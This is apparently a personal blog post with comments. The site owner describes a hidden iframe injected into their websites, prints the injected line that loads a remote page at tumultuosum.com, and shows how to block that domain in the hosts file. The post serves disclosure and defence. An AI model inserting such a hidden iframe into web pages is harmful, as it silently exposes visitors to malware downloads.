Recently I noticed something else than google analytics loading in the status bar when I visited some of my sites, so I thought I`ll have a closer look.
Of course, I removed the links without thinking, but I did save thescript.
Here is how the script looks:
Here is what the script does:
<iframe src="http://tumultuosum.com/ep/index.php" style="visibility: hidden; display: none"></iframe>
Here is the iframe content:
Probably a trojan of some knind, didn`t feel like looking any further.
Interesting thing is how that code got on my websites. I`m sure my account was not hacked, if it was so, all my sites would have been messed with, so I`m guessing it was the server that got hacked. What people would do for a few extra links and traffic.
As for the surfers, I guess you should block that site so you won`t get infected with who knows what.
Easyest way to do that is to edit your hosts file.
Where to find hosts file:
Windows Vista = C:\WINDOWS\SYSTEM32\DRIVERS\ETC Windows XP = C:\WINDOWS\SYSTEM32\DRIVERS\ETC Windows 2K = C:\WINNT\SYSTEM32\DRIVERS\ETC Win 98/ME = C:\WINDOWS
How hosts file contents look like:
Edit and add the unvanted site:
How it should look now:
127.0.0.1 localhost 127.0.0.1 tumultuosum.com
So if anyone knows John Phillips, the person that seems to own the domain “tumultuosum”, tell him that either he got hacked or he`s just a big fat jerk and a lousy hacker.
5 thoughts on “Hacked!?”
Wow, I can’t believe they were able to get into your server… No doubt, what some people will do…
I use a shared hosting plan from Host I Can and have not found such hacks but I hear all the time that shared hosting plans get hacked a lot because once in a hacker can access hundreds of sites and gain links or do destruction easily. Unfortunately I cannot do anything to the server to protect myself.
They did not access your server, and your site is still vulnerable. The exploit used in this attack is called XSS or cross-site scripting. XSS is a vulnerability in web applications & forms which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Often during an attack “everything looks fine” to the end-user.
I see you are using WordPress which is rife with XSS vulnerabilities, however, a lot of web applications are, it’s doesn’t mean WP is crap. Just try and update to the latest version if you haven’t and start looking for WP and XSS related info so you can fix the hole.
I came across this blog the other day and you got some great info here – thanks.
Or use the NoScript plugin for Firefox. Additionally, I’ve seen sites being hacked due to FrontPage Extensions not being removed properly. If you don’t know, Microsoft has stopped development and support for FrontPage Extensions.